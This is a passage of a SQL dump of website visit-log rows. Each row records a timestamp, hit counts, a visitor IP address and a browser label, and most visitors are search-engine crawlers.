1529743425,2,2,0,0,'91.196.178.169','chrome'),(261503,1529743528,1,0,1,0,'66.249.70.27',''),(261504,1529743990,1,1,0,0,'52.87.252.97','other'),(261505,1529744016,1,0,1,0,'66.249.70.25',''),(261506,1529744069,1,1,0,0,'216.244.66.241','other'),(261507,1529744327,1,1,0,0,'8.29.198.25','other'),(261508,1529744334,2,2,0,0,'91.196.178.61','chrome'),(261509,1529744406,2,2,0,0,'130.180.218.188','chrome'),(261510,1529744503,1,1,0,0,'66.249.70.25','chrome'),(261511,1529744692,1,1,0,0,'141.8.142.74','other'),(261512,1529744930,1,1,0,0,'52.87.252.97','other'),(261513,1529745304,1,1,0,0,'216.244.66.241','other'),(261514,1529745426,2,1,1,0,'66.249.70.27',''),(261515,1529745612,32,32,0,0,'167.114.219.41','other'),(261516,1529745817,1,1,0,0,'46.219.238.185','firefox'),(261517,1529745865,1,1,0,0,'52.87.252.97','other'),(261518,1529746780,1,1,0,0,'52.87.252.97','other'),(261519,1529746998,2,0,2,0,'66.249.70.25',''),(261520,1529747256,1,0,1,0,'66.249.70.27',''),(261521,1529747489,1,1,0,0,'66.249.70.29','chrome'),(261522,1529747693,1,1,0,0,'52.87.252.97','other'),(261523,1529748204,1,1,0,0,'77.37.165.117','chrome'),(261524,1529748206,1,1,0,0,'37.204.205.143','chrome'),(261525,1529748626,1,1,0,0,'52.87.252.97','other'),(261526,1529748913,1,1,0,0,'40.77.167.213','other'),(261527,1529748926,1,0,1,0,'66.249.64.28',''),(261528,1529748992,1,0,1,0,'66.249.70.29',''),(261529,1529749261,1,0,1,0,'66.249.70.27',''),(261530,1529749557,1,1,0,0,'52.87.252.97','other'),(261531,1529750010,1,1,0,0,'8.29.198.25','other'),(261532,1529750039,2,0,2,0,'66.249.70.29',''),(261533,1529750465,1,1,0,0,'37.204.189.158','msie'),(261534,1529750480,1,1,0,0,'52.87.252.97','other'),(261535,1529751356,5,5,0,0,'66.249.70.29','chrome'),(261536,1529751386,1,1,0,0,'52.87.252.97','other'),(261537,1529751407,1,1,0,0,'163.172.4.153','chrome'),(261538,1529751453,1,1,0,0,'66.249.70.27','chrome'),(261539,1529751584,1,1,0,0,'37.9.113.182','other'),(261540,1529751650,2,2,0,0,'130.180.218.188','chrome'),(261541,1529752324,1,1,0,0,'52.87.252.97','other'),(261542,1529752549,1,0,1,0,'66.249.64.28',''),(261543,1529753230,1,1,0,0,'52.87.252.97','other'),(261544,1529753519,1,1,0,0,'37.9.113.182','other'),(261545,1529753732,1,1,0,0,'178.154.171.88','other'),(261546,1529754134,1,1,0,0,'52.87.252.97','other'),(261547,1529754199,1,1,0,0,'216.244.66.241','other'),(261548,1529754675,1,1,0,0,'91.209.11.236','other'),(261549,1529754876,1,1,0,0,'178.154.171.88','other'),(261550,1529755038,1,1,0,0,'52.87.252.97','other'),(261551,1529755169,1,1,0,0,'8.29.198.26','other'),(261552,1529755814,1,1,0,0,'178.154.171.88','other'),(261553,1529755979,1,1,0,0,'52.87.252.97','other'),(261554,1529756029,1,1,0,0,'37.9.113.182','other'),(261555,1529756226,2,0,2,0,'66.249.70.25',''),(261556,1529756236,3,2,1,0,'66.249.70.27',''),(261557,1529756490,1,1,0,0,'216.244.66.241','other'),(261558,1529756817,1,1,0,0,'141.8.142.74','other'),(261559,1529756955,1,1,0,0,'52.87.252.97','other'),(261560,1529756956,102,102,0,0,'40.77.167.213','other'),(261561,1529757049,92,92,0,0,'207.46.13.107','other'),(261562,1529757157,81,81,0,0,'157.55.39.137','other'),(261563,1529757824,1,1,0,0,'194.44.117.92','firefox'),(261564,1529757891,1,1,0,0,'52.87.252.97','other'),(261565,1529758108,1,1,0,0,'66.249.64.29','chrome'),(261566,1529758134,2,1,1,0,'66.249.64.28',''),(261567,1529758178,2,1,1,0,'66.249.70.29',''),(261568,1529758261,1,1,0,0,'141.8.142.74','other'),(261569,1529758362,1,1,0,0,'37.9.113.115','other'),(261570,1529758648,2,1,1,0,'66.249.70.27',''),(261571,1529758828,1,1,0,0,'52.87.252.97','other'),(261572,1529759096,1,1,0,0,'91.196.178.91','chrome'),(261573,1529759244,1,1,0,0,'216.244.66.241','other'),(261574,1529759773,1,1,0,0,'52.87.252.97','other'),(261575,1529760586,1,0,1,0,'66.249.64.30',''),(261576,1529760604,2,2,0,0,'157.55.39.137','other'),(261577,1529760679,1,1,0,0,'52.87.252.97','other'),(261578,1529760861,1,1,0,0,'8.29.198.26','other'),(261579,1529761347,2,1,1,0,'66.249.70.29',''),(261580,1529761587,1,1,0,0,'52.87.252.97','other'),(261581,1529761862,1,1,0,0,'37.9.113.182','other'),(261582,1529762314,3,3,0,0,'141.8.142.74','other'),(261583,1529762476,1,0,1,0,'66.249.70.25',''),(261584,1529762523,1,1,0,0,'52.87.252.97','other'),(261585,1529762668,1,1,0,0,'91.196.177.137','firefox'),(261586,1529763461,1,1,0,0,'52.87.252.97','other'),(261587,1529763501,1,1,0,0,'141.8.142.74','other'),(261588,1529763806,1,0,1,0,'66.249.70.25',''),(261589,1529764370,1,1,0,0,'52.87.252.97','other'),(261590,1529764477,1,1,0,0,'91.196.178.61','chrome'),(261591,1529764501,1,1,0,0,'178.92.248.205','firefox'),(261592,1529764706,1,1,0,0,'66.249.64.30','chrome'),(261593,1529764882,1,1,0,0,'178.154.171.88','other'),(261594,1529764932,1,0,1,0,'66.249.70.27',''),(261595,1529765310,1,1,0,0,'52.87.252.97','other'),(261596,1529765396,2,0,2,0,'66.249.70.29',''),(261597,1529765745,1,1,0,0,'216.244.66.241','other'),(261598,1529766008,1,1,0,0,'8.29.198.26','other'),(261599,1529766258,1,1,0,0,'52.87.252.97','other'),(261600,1529766372,1,1,0,0,'180.76.15.156','other'),(261601,1529766410,1,1,0,0,'91.196.178.66','firefox'),(261602,1529766665,1,1,0,0,'141.8.132.19','other'),(261603,1529766730,2,2,0,0,'141.8.142.74','other'),(261604,1529766776,2,2,0,0,'91.196.178.175','chrome'),(261605,1529767191,1,1,0,0,'52.87.252.97','other'),(261606,1529767528,2,2,0,0,'91.196.178.177','chrome'),(261607,1529767685,1,1,0,0,'178.154.171.88','other'),(261608,1529768092,1,1,0,0,'52.87.252.97','other'),(261609,1529768322,1,1,0,0,'91.124.238.251','chrome'),(261610,1529768493,1,1,0,0,'91.196.178.102','chrome'),(261611,1529768696,2,2,0,0,'178.92.250.77','chrome'),(261612,1529768829,2,2,0,0,'54.165.59.7','other'),(261613,1529769023,1,1,0,0,'52.87.252.97','other'),(261614,1529769385,1,1,0,0,'216.244.66.241','other'),(261615,1529769403,1,1,0,0,'66.249.70.29','chrome'),(261616,1529769504,1,1,0,0,'40.77.167.204','other'),(261617,1529769566,1,1,0,0,'213.180.203.8','other'),(261618,1529769956,1,1,0,0,'52.87.252.97','other'),(261619,1529770002,1,1,0,0,'66.249.64.30','chrome'),(261620,1529770004,1,0,1,0,'66.249.64.28',''),(261621,1529770327,1,1,0,0,'178.154.171.88','other'),(261622,1529770424,1,1,0,0,'141.8.142.74','other'),(261623,1529770431,1,1,0,0,'107.167.105.175','other'),(261624,1529770495,1,0,1,0,'66.249.70.25',''),(261625,1529770497,1,1,0,0,'66.249.70.25','chrome'),(261626,1529770564,1,1,0,0,'91.196.178.102','chrome'),(261627,1529770893,1,1,0,0,'52.87.252.97','other'),(261628,1529771138,2,1,1,0,'66.249.70.29',''),(261629,1529771269,1,0,1,0,'66.249.64.29',''),(261630,1529771709,1,1,0,0,'8.29.198.25','other'),(261631,1529771818,1,1,0,0,'52.87.252.97','other'),(261632,1529772194,1,1,0,0,'5.228.29.180','msie'),(261633,1529772267,1,1,0,0,'216.244.66.241','other'),(261634,1529772510,1,1,0,0,'141.8.142.74','other'),(261635,1529772722,1,1,0,0,'52.87.252.97','other'),(261636,1529773152,1,1,0,0,'180.76.15.142','other'),(261637,1529773393,1,1,0,0,'37.9.113.101','other'),(261638,1529773653,1,1,0,0,'52.87.252.97','other'),(261639,1529773715,1,1,0,0,'66.249.64.30','chrome'),(261640,1529774436,1,1,0,0,'157.55.39.137','other'),(261641,1529774452,1,1,0,0,'141.8.142.74','other'),(261642,1529774588,1,1,0,0,'52.87.252.97','other'),(261643,1529775130,2,2,0,0,'178.154.171.88','other'),(261644,1529775512,1,1,0,0,'52.87.252.97','other'),(261645,1529775766,1,1,0,0,'66.249.64.28','chrome'),(261646,1529776041,1,1,0,0,'141.8.142.74','other'),(261647,1529776310,1,0,1,0,'66.249.70.25',''),(261648,1529776313,1,1,0,0,'66.249.70.25','chrome'),(261649,1529776402,1,1,0,0,'216.244.66.241','other'),(261650,1529776444,1,1,0,0,'52.87.252.97','other'),(261651,1529776577,1,1,0,0,'178.154.171.88','other'),(261652,1529776845,1,1,0,0,'8.29.198.25','other'),(261653,1529777375,1,1,0,0,'52.87.252.97','other'),(261654,1529777522,1,1,0,0,'178.154.171.88','other'),(261655,1529777576,1,1,0,0,'66.249.70.27','chrome'),(261656,1529778310,1,1,0,0,'52.87.252.97','other'),(261657,1529778872,1,1,0,0,'141.8.142.74','other'),(261658,1529778937,2,2,0,0,'178.154.171.88','other'),(261659,1529779238,1,1,0,0,'52.87.252.97','other'),(261660,1529779531,1,1,0,0,'52.53.201.78','chrome'),(261661,1529780099,1,1,0,0,'37.73.207.36','chrome'),(261662,1529780135,1,1,0,0,'141.8.142.74','other'),(261663,1529780168,1,1,0,0,'52.87.252.97','other'),(261664,1529781101,1,1,0,0,'52.87.252.97','other'),(261665,1529781213,1,1,0,0,'87.250.224.46','other'),(261666,1529781289,1,1,0,0,'216.244.66.241','other'),(261667,1529781328,1,1,0,0,'5.34.183.64','firefox'),(261668,1529781509,1,1,0,0,'188.130.176.3','chrome'),(261669,1529781761,2,2,0,0,'141.8.142.74','other'),(261670,1529781966,1,1,0,0,'141.8.132.19','other'),(261671,1529782036,1,1,0,0,'52.87.252.97','other'),(261672,1529782216,1,1,0,0,'91.196.178.92','firefox'),(261673,1529782542,1,1,0,0,'8.29.198.25','other'),(261674,1529782869,1,1,0,0,'141.8.142.74','other'),(261675,1529782963,1,1,0,0,'52.87.252.97','other'),(261676,1529783031,1,1,0,0,'178.154.171.88','other'),(261677,1529783298,1,0,1,0,'66.249.64.28',''),(261678,1529783375,1,1,0,0,'66.249.70.25','chrome'),(261679,1529783472,1,1,0,0,'78.111.189.102','chrome'),(261680,1529783896,1,1,0,0,'52.87.252.97','other'),(261681,1529784120,2,2,0,0,'216.244.66.241','other'),(261682,1529784800,1,1,0,0,'178.154.171.88','other'),(261683,1529784827,1,1,0,0,'52.87.252.97','other'),(261684,1529785136,1,1,0,0,'141.8.142.74','other'),(261685,1529785537,1,1,0,0,'216.244.66.241','other'),(261686,1529785752,1,1,0,0,'52.87.252.97','other'),(261687,1529786360,1,1,0,0,'159.224.177.211','chrome'),(261688,1529786447,2,2,0,0,'141.8.142.74','other'),(261689,1529786472,1,1,0,0,'87.250.224.46','other'),(261690,1529786686,1,1,0,0,'52.87.252.97','other'),(261691,1529786749,1,1,0,0,'216.244.66.241','other'),(261692,1529786751,1,1,0,0,'178.154.171.88','other'),(261693,1529787587,1,1,0,0,'141.8.142.74','other'),(261694,1529787618,1,1,0,0,'52.87.252.97','other'),(261695,1529787691,1,1,0,0,'8.29.198.25','other'),(261696,1529787734,1,0,1,0,'66.249.64.30',''),(261697,1529788293,1,1,0,0,'91.196.178.102','chrome'),(261698,1529789436,1,0,1,0,'66.249.70.25',''),(261699,1529789449,1,1,0,0,'178.154.171.88','other'),(261700,1529790516,2,2,0,0,'40.77.167.158','other'),(261701,1529791030,1,1,0,0,'141.8.142.74','other'),(261702,1529791748,1,1,0,0,'66.249.70.27','chrome'),(261703,1529792002,1,0,1,0,'66.249.64.30',''),(261704,1529792081,1,1,0,0,'216.244.66.241','other'),(261705,1529792273,2,2,0,0,'178.154.171.88','other'),(261706,1529792291,1,1,0,0,'66.249.64.29','chrome'),(261707,1529793389,1,1,0,0,'8.29.198.25','other'),(261708,1529793401,2,2,0,0,'66.249.70.27','chrome'),(261709,1529793579,1,1,0,0,'180.76.15.27','other'),(261710,1529793852,1,1,0,0,'178.154.200.41','other'),(261711,1529794432,1,1,0,0,'157.55.39.137','other'),(261712,1529795077,1,1,0,0,'66.249.70.5','chrome'),(261713,1529795615,2,2,0,0,'141.8.142.74','other'),(261714,1529795816,1,1,0,0,'95.163.255.94','other'),(261715,1529796189,3,0,3,0,'66.249.64.30',''),(261716,1529797205,1,1,0,0,'37.73.245.103','chrome'),(261717,1529797488,1,1,0,0,'95.163.255.106','other'),(261718,1529797516,1,1,0,0,'95.163.255.118','other'),(261719,1529797543,1,1,0,0,'95.163.255.103','other'),(261720,1529797570,1,1,0,0,'95.163.255.113','other'),(261721,1529798324,1,0,1,0,'66.249.70.25',''),(261722,1529798531,1,1,0,0,'8.29.198.27','other'),(261723,1529798752,1,1,0,0,'178.154.171.88','other'),(261724,1529799991,1,1,0,0,'91.209.11.236','other'),(261725,1529800100,1,0,1,0,'66.249.64.28',''),(261726,1529800897,1,1,0,0,'66.249.70.29','chrome'),(261727,1529801761,1,0,1,0,'66.249.64.30',''),(261728,1529802937,1,1,0,0,'178.154.171.88','other'),(261729,1529802955,2,2,0,0,'216.244.66.241','other'),(261730,1529803740,1,1,0,0,'141.8.142.74','other'),(261731,1529804229,1,1,0,0,'8.29.198.27','other'),(261732,1529804849,1,0,1,0,'66.249.64.28',''),(261733,1529805037,1,0,1,0,'66.249.70.25',''),(261734,1529805797,1,1,0,0,'66.249.70.25','chrome'),(261735,1529805798,1,1,0,0,'178.154.171.88','other'),(261736,1529806901,1,1,0,0,'178.154.171.88','other'),(261737,1529807499,1,1,0,0,'66.249.70.29','chrome'),(261738,1529807954,1,1,0,0,'216.244.66.241','other'),(261739,1529808168,1,1,0,0,'141.8.142.74','other'),(261740,1529808617,1,0,1,0,'66.249.64.28',''),(261741,1529809124,1,1,0,0,'95.163.255.102','other'),(261742,1529809371,1,1,0,0,'8.29.198.26','other'),(261743,1529810561,1,1,0,0,'216.244.66.241','other'),(261744,1529810723,1,1,0,0,'87.250.224.46','other'),(261745,1529811120,1,1,0,0,'178.154.171.88','other'),(261746,1529811414,2,2,0,0,'141.8.142.74','other'),(261747,1529812036,2,0,2,0,'66.249.64.28',''),(261748,1529812238,1,1,0,0,'66.249.64.30','chrome'),(261749,1529812314,1,0,1,0,'66.249.70.25',''),(261750,1529812361,2,2,0,0,'46.4.52.175','other'),(261751,1529812733,1,1,0,0,'178.154.171.88','other'),(261752,1529814452,2,2,0,0,'141.8.142.74','other'),(261753,1529814547,1,1,0,0,'178.154.171.88','other'),(261754,1529815068,1,1,0,0,'8.29.198.25','other'),(261755,1529815225,1,1,0,0,'66.249.70.29','chrome'),(261756,1529815233,1,0,1,0,'66.249.64.28',''),(261757,1529816178,1,1,0,0,'157.55.39.137','other'),(261758,1529816270,1,1,0,0,'40.77.167.204','other'),(261759,1529816725,1,1,0,0,'95.163.255.117','other'),(261760,1529817927,1,1,0,0,'66.249.70.27','chrome'),(261761,1529818208,1,1,0,0,'180.76.15.144','other'),(261762,1529819538,1,1,0,0,'66.249.64.29','chrome'),(261763,1529819839,1,1,0,0,'188.130.176.3','chrome'),(261764,1529820199,1,1,0,0,'8.29.198.27','other'),(261765,1529820279,1,1,0,0,'216.244.66.241','other'),(261766,1529821405,2,0,2,0,'66.249.64.30',''),(261767,1529821452,1,0,1,0,'66.249.70.27',''),(261768,1529822074,1,1,0,0,'216.244.66.241','other'),(261769,1529822259,1,1,0,0,'95.163.255.94','other'),(261770,1529822541,1,1,0,0,'37.9.113.182','other'),(261771,1529822769,1,0,1,0,'66.249.70.29',''),(261772,1529822795,1,1,0,0,'66.249.70.27','chrome'),(261773,1529822982,1,1,0,0,'141.8.142.74','other'),(261774,1529823518,1,0,1,0,'66.249.64.30',''),(261775,1529823555,1,1,0,0,'66.249.70.25','chrome'),(261776,1529823597,4,0,4,0,'66.249.64.28',''),(261777,1529823703,1,1,0,0,'216.244.66.241','other'),(261778,1529823740,1,1,0,0,'77.37.242.35','msie'),(261779,1529824345,3,0,3,0,'66.249.64.29',''),(261780,1529825017,1,0,1,0,'66.249.70.27',''),(261781,1529825646,1,1,0,0,'141.8.142.74','other'),(261782,1529825802,2,0,2,0,'66.249.64.30',''),(261783,1529825905,1,1,0,0,'8.29.198.27','other'),(261784,1529826180,3,0,3,0,'66.249.64.29',''),(261785,1529826750,1,0,1,0,'66.249.64.30',''),(261786,1529827087,1,1,0,0,'178.154.200.41','other'),(261787,1529827244,1,1,0,0,'178.154.171.88','other'),(261788,1529827274,1,1,0,0,'207.46.13.107','other'),(261789,1529827380,2,0,2,0,'66.249.64.28',''),(261790,1529828297,1,1,0,0,'37.110.43.221','firefox'),(261791,1529828456,1,1,0,0,'40.77.167.204','other'),(261792,1529828629,1,1,0,0,'40.77.167.158','other'),(261793,1529829294,1,1,0,0,'192.151.157.210','other'),(261794,1529829304,2,0,2,0,'66.249.64.28',''),(261795,1529829832,1,1,0,0,'207.46.13.107','other'),(261796,1529829906,1,1,0,0,'95.216.38.186','other'),(261797,1529829922,1,0,1,0,'66.249.70.25',''),(261798,1529829967,1,0,1,0,'66.249.70.27',''),(261799,1529830208,1,0,1,0,'66.249.64.29',''),(261800,1529830216,1,1,0,0,'141.8.142.74','other'),(261801,1529830309,1,1,0,0,'47.106.37.223','other'),(261802,1529830613,2,2,0,0,'91.196.178.165','chrome'),(261803,1529831033,1,1,0,0,'8.29.198.25','other'),(261804,1529831186,1,1,0,0,'34.229.80.224','other'),(261805,1529831434,1,0,1,0,'66.249.64.28',''),(261806,1529831622,3,3,0,0,'216.244.66.241','other'),(261807,1529832066,2,0,2,0,'66.249.64.30',''),(261808,1529832469,1,1,0,0,'178.128.167.123','other'),(261809,1529832805,1,1,0,0,'66.249.70.27','chrome'),(261810,1529832840,1,0,1,0,'66.249.70.25',''),(261811,1529833377,1,1,0,0,'216.244.66.241','other'),(261812,1529833476,1,1,0,0,'37.73.37.239','chrome'),(261813,1529834045,1,0,1,0,'66.249.64.30',''),(261814,1529834282,1,1,0,0,'216.244.66.241','other'),(261815,1529834721,1,1,0,0,'178.154.200.41','other'),(261816,1529836136,1,0,1,0,'66.249.64.30',''),(261817,1529836530,1,1,0,0,'37.9.113.182','other'),(261818,1529836592,1,1,0,0,'37.9.113.101','other'),(261819,1529836667,1,1,0,0,'66.249.70.25','chrome'),(261820,1529836731,1,1,0,0,'8.29.198.27','other'),(261821,1529837363,1,1,0,0,'157.55.39.137','other'),(261822,1529837484,1,0,1,0,'66.249.64.29',''),(261823,1529837501,2,2,0,0,'141.8.142.74','other'),(261824,1529837917,1,0,1,0,'66.249.64.28',''),(261825,1529838344,1,1,0,0,'91.196.178.74','chrome'),(261826,1529838443,1,0,1,0,'66.249.64.29',''),(261827,1529840583,2,0,2,0,'66.249.64.29',''),(261828,1529840826,3,0,3,0,'66.249.64.30',''),(261829,1529841485,2,0,2,0,'66.249.70.27',''),(261830,1529841745,1,1,0,0,'66.249.64.28','chrome'),(261831,1529841838,1,1,0,0,'37.9.113.182','other'),(261832,1529841861,1,1,0,0,'8.29.198.27','other'),(261833,1529842018,1,1,0,0,'178.154.171.88','other'),(261834,1529842746,3,1,2,0,'66.249.70.29',''),(261835,1529843044,4,0,4,0,'66.249.64.29',''),(261836,1529843056,8,0,8,0,'66.249.64.28',''),(261837,1529843075,2,0,2,0,'66.249.70.25',''),(261838,1529843106,2,0,2,0,'66.249.64.30',''),(261839,1529843198,2,2,0,0,'141.8.142.74','other'),(261840,1529843567,1,1,0,0,'40.77.167.204','other'),(261841,1529843807,1,1,0,0,'178.154.171.88','other'),(261842,1529843844,47,47,0,0,'54.158.15.97','other'),(261843,1529844374,1,0,1,0,'66.249.64.29',''),(261844,1529844758,46,46,0,0,'54.158.15.97','other'),(261845,1529845053,1,1,0,0,'18.208.177.12','other'),(261846,1529845668,2,2,0,0,'54.158.15.97','other'),(261847,1529846067,1,1,0,0,'91.124.58.1','chrome'),(261848,1529846446,2,2,0,0,'141.8.142.74','other'),(261849,1529846937,1,1,0,0,'18.208.177.12','other'),(261850,1529847581,1,1,0,0,'8.29.198.26','other'),(261851,1529847626,1,1,0,0,'141.8.142.74','other'),(261852,1529848488,1,1,0,0,'35.172.133.98','other'),(261853,1529849443,1,1,0,0,'207.46.13.107','other'),(261854,1529849709,1,1,0,0,'216.244.66.241','other'),(261855,1529849885,1,1,0,0,'35.172.133.98','other'),(261856,1529850233,1,0,1,0,'66.249.64.29',''),(261857,1529850259,1,0,1,0,'66.249.70.29',''),(261858,1529850307,1,1,0,0,'66.249.70.29','chrome'),(261859,1529851044,1,1,0,0,'23.101.169.3','msie'),(261860,1529851388,1,1,0,0,'35.172.133.98','other'),(261861,1529851553,1,1,0,0,'37.9.113.157','other'),(261862,1529851573,1,1,0,0,'216.244.66.241','other'),(261863,1529852417,1,1,0,0,'95.163.255.96','other'),(261864,1529852686,1,1,0,0,'8.29.198.25','other'),(261865,1529852974,1,0,1,0,'66.249.64.30',''),(261866,1529852998,2,0,2,0,'66.249.70.29',''),(261867,1529853233,1,1,0,0,'141.8.142.74','other'),(261868,1529853684,1,1,0,0,'66.249.64.29','chrome'),(261869,1529854048,1,1,0,0,'40.77.167.204','other'),(261870,1529854218,1,1,0,0,'46.201.135.141','chrome'),(261871,1529854346,1,1,0,0,'37.73.155.65','chrome'),(261872,1529854725,1,1,0,0,'66.249.64.30','chrome'),(261873,1529855052,1,1,0,0,'66.249.70.29','chrome'),(261874,1529856174,1,0,1,0,'66.249.64.29',''),(261875,1529856601,1,1,0,0,'199.59.150.180','other'),(261876,1529856744,1,1,0,0,'87.250.224.46','other'),(261877,1529857979,1,0,1,0,'66.249.64.30',''),(261878,1529858315,1,1,0,0,'141.8.142.74','other'),(261879,1529858421,1,1,0,0,'8.29.198.26','other'),(261880,1529858861,2,2,0,0,'216.244.66.241','other'),(261881,1529859436,1,1,0,0,'37.9.113.182','other'),(261882,1529859454,1,0,1,0,'66.249.64.28',''),(261883,1529859672,1,1,0,0,'180.76.15.147','other'),(261884,1529860049,1,0,1,0,'66.249.64.30',''),(261885,1529860374,1,1,0,0,'141.8.142.74','other'),(261886,1529860378,1,1,0,0,'66.249.70.25','chrome'),(261887,1529860765,1,0,1,0,'66.249.64.29',''),(261888,1529860873,1,1,0,0,'40.77.167.204','other'),(261889,1529861669,1,1,0,0,'37.204.38.69','msie'),(261890,1529863276,1,1,0,0,'91.196.178.74','chrome'),(261891,1529863319,1,0,1,0,'66.249.64.30',''),(261892,1529863513,1,1,0,0,'8.29.198.26','other'),(261893,1529863692,1,0,1,0,'66.249.64.29',''),(261894,1529863853,1,0,1,0,'66.249.70.25',''),(261895,1529864366,1,1,0,0,'37.9.113.182','other'),(261896,1529864851,3,3,0,0,'141.8.142.74','other'),(261897,1529864937,1,1,0,0,'178.154.171.88','other'),(261898,1529865034,1,0,1,0,'66.249.64.29',''),(261899,1529865755,1,1,0,0,'66.249.70.29','chrome'),(261900,1529866423,1,0,1,0,'66.249.64.28',''),(261901,1529866456,1,1,0,0,'185.45.193.195','firefox'),(261902,1529866689,1,1,0,0,'91.196.178.99','chrome'),(261903,1529866801,1,1,0,0,'157.55.39.137','other'),(261904,1529866999,1,0,1,0,'66.249.64.29',''),(261905,1529867008,1,1,0,0,'216.244.66.241','other'),(261906,1529868056,1,0,1,0,'66.249.64.28',''),(261907,1529868344,1,0,1,0,'66.249.64.29',''),(261908,1529868858,1,1,0,0,'216.244.66.241','other'),(261909,1529869254,1,1,0,0,'8.29.198.27','other'),(261910,1529869257,1,1,0,0,'95.163.255.98','other'),(261911,1529869294,1,1,0,0,'95.163.255.95','other'),(261912,1529871174,2,1,1,0,'66.249.70.25',''),(261913,1529871386,1,1,0,0,'178.154.171.88','other'),(261914,1529871793,2,2,0,0,'178.92.250.77','chrome'),(261915,1529871841,1,1,0,0,'91.196.177.163','chrome'),(261916,1529871964,1,0,1,0,'66.249.64.14',''),(261917,1529871996,1,0,1,0,'66.249.70.29',''),(261918,1529872079,1,0,1,0,'66.249.64.29',''),(261919,1529872107,3,0,3,0,'66.249.64.28',''),(261920,1529872421,1,1,0,0,'95.163.255.93','other'),(261921,1529873520,2,0,2,0,'66.249.64.29',''),(261922,1529873695,1,0,1,0,'66.249.64.30',''),(261923,1529874260,1,1,0,0,'178.154.171.88','other'),(261924,1529874333,1,1,0,0,'8.29.198.25','other'),(261925,1529874339,1,0,1,0,'66.249.70.27',''),(261926,1529874647,1,1,0,0,'87.250.224.46','other'),(261927,1529875135,1,0,1,0,'66.249.70.25',''),(261928,1529875193,2,2,0,0,'178.154.200.41','other'),(261929,1529875511,1,1,0,0,'216.244.66.241','other'),(261930,1529875726,1,0,1,0,'66.249.64.28',''),(261931,1529876487,1,1,0,0,'157.55.39.137','other'),(261932,1529876660,1,1,0,0,'66.249.70.29','chrome'),(261933,1529878228,1,1,0,0,'141.8.142.74','other'),(261934,1529879054,1,1,0,0,'95.163.255.96','other'),(261935,1529879140,1,1,0,0,'37.9.113.110','other'),(261936,1529879151,1,1,0,0,'178.154.171.88','other'),(261937,1529879163,1,1,0,0,'141.8.142.74','other'),(261938,1529879236,1,0,1,0,'66.249.64.29',''),(261939,1529879339,1,0,1,0,'66.249.64.30',''),(261940,1529880088,1,1,0,0,'8.29.198.25','other'),(261941,1529880669,1,0,1,0,'66.249.70.27',''),(261942,1529881106,1,1,0,0,'180.76.15.28','other'),(261943,1529881642,1,1,0,0,'46.42.163.230','msie'),(261944,1529881748,10,10,0,0,'144.217.5.52','other'),(261945,1529881896,1,0,1,0,'66.249.64.14',''),(261946,1529881982,1,1,0,0,'66.249.70.25','chrome'),(261947,1529882166,2,2,0,0,'141.8.142.74','other'),(261948,1529882254,1,1,0,0,'216.244.66.241','other'),(261949,1529883475,1,1,0,0,'216.244.66.241','other'),(261950,1529883544,1,0,1,0,'66.249.70.29',''),(261951,1529883654,1,1,0,0,'87.250.224.46','other'),(261952,1529884506,1,0,1,0,'66.249.70.27',''),(261953,1529885170,1,1,0,0,'8.29.198.27','other'),(261954,1529885210,1,0,1,0,'66.249.70.25',''),(261955,1529885547,1,0,1,0,'66.249.64.29',''),(261956,1529887761,1,1,0,0,'66.249.70.27','chrome'),(261957,1529888004,1,1,0,0,'40.77.167.158','other'),(261958,1529888377,1,1,0,0,'95.163.255.92','other'),(261959,1529888431,3,0,3,0,'66.249.64.29',''),(261960,1529890044,1,1,0,0,'37.9.113.182','other'),(261961,1529890050,2,1,1,0,'66.249.64.28',''),(261962,1529890471,1,0,1,0,'66.249.64.30',''),(261963,1529890925,1,1,0,0,'8.29.198.27','other'),(261964,1529892292,1,0,1,0,'66.249.64.30',''),(261965,1529892519,1,0,1,0,'66.249.70.27',''),(261966,1529892805,1,1,0,0,'66.249.70.25','chrome'),(261967,1529892836,1,1,0,0,'216.244.66.241','other'),(261968,1529893400,1,0,1,0,'66.249.64.30',''),(261969,1529895204,1,1,0,0,'54.165.59.7','other'),(261970,1529896004,1,1,0,0,'8.29.198.26','other'),(261971,1529896921,1,1,0,0,'95.163.255.93','other'),(261972,1529896995,1,0,1,0,'66.249.64.28',''),(261973,1529897360,1,0,1,0,'66.249.64.30',''),(261974,1529898019,1,1,0,0,'66.249.70.25','chrome'),(261975,1529898026,3,3,0,0,'216.244.66.241','other'),(261976,1529898771,1,0,1,0,'66.249.64.30',''),(261977,1529898836,1,0,1,0,'66.249.64.29',''),(261978,1529898924,2,0,2,0,'66.249.64.28',''),(261979,1529901648,1,1,0,0,'173.249.24.45','firefox'),(261980,1529901758,1,1,0,0,'8.29.198.27','other'),(261981,1529902231,1,1,0,0,'216.244.66.241','other'),(261982,1529902612,1,1,0,0,'54.165.59.7','other'),(261983,1529902704,1,0,1,0,'66.249.70.25',''),(261984,1529903108,1,1,0,0,'66.249.70.25','chrome'),(261985,1529903323,1,1,0,0,'207.46.13.99','other'),(261986,1529903538,2,2,0,0,'103.11.74.118','chrome'),(261987,1529903668,3,1,2,0,'66.249.64.28',''),(261988,1529903710,1,0,1,0,'66.249.64.30',''),(261989,1529903752,2,0,2,0,'66.249.64.29',''),(261990,1529903799,2,2,0,0,'91.196.178.78','chrome'),(261991,1529903921,2,1,1,0,'66.249.64.28',''),(261992,1529905234,1,1,0,0,'46.219.121.3','chrome'),(261993,1529905719,1,1,0,0,'18.207.227.104','other'),(261994,1529906048,1,0,1,0,'66.249.64.28',''),(261995,1529906623,2,2,0,0,'195.230.119.59','chrome'),(261996,1529906790,1,0,1,0,'66.249.64.29',''),(261997,1529906831,1,1,0,0,'8.29.198.25','other'),(261998,1529907177,1,1,0,0,'178.154.171.88','other'),(261999,1529907546,2,2,0,0,'216.244.66.241','other'),(262000,1529907601,1,1,0,0,'157.55.39.137','other'),(262001,1529907616,1,1,0,0,'82.207.121.233','chrome'),(262002,1529907644,2,2,0,0,'91.196.178.78','chrome'),(262003,1529908270,1,0,1,0,'66.249.70.29',''),(262004,1529909377,1,1,0,0,'66.249.70.27','chrome'),(262005,1529910131,1,1,0,0,'95.135.224.189','chrome'),(262006,1529910181,1,1,0,0,'91.196.178.78','chrome'),(262007,1529910236,3,0,3,0,'66.249.64.29',''),(262008,1529910322,1,0,1,0,'66.249.64.28',''),(262009,1529911121,2,2,0,0,'91.196.178.169','chrome'),(262010,1529911657,3,3,0,0,'109.108.78.135','chrome'),(262011,1529911710,1,1,0,0,'62.205.134.182','other'),(262012,1529911999,1,0,1,0,'66.249.64.28',''),(262013,1529912469,1,1,0,0,'207.46.13.107','other'),(262014,1529912607,1,1,0,0,'8.29.198.25','other'),(262015,1529912619,1,1,0,0,'91.196.178.54','chrome'),(262016,1529912828,2,2,0,0,'91.196.178.93','c